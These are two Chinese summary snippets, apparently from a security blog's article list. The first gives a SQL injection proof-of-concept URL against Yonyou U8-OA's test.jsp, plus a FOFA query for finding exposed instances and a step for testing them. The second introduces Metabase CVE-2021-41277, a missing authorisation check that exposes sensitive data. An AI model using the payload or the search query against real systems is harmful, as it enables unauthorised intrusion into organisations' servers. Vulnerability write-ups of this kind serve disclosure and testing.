摘要：1-漏洞POC POC：http://IP:PORT/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1)) 2-使用fofa搜索 title="用友U8-OA" 3-漏洞验证 打开fofa搜索到的资产，在url中拼接poc，使用sq 阅读全文

摘要：一、漏洞简介 metabase 是一个简单、开源的数据分析平台。 CVE-2021-41277 在受影响的版本中，自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）操作缺少权限验证，攻击者可通过该漏洞获得敏感信息。 该漏洞CVS 阅读全文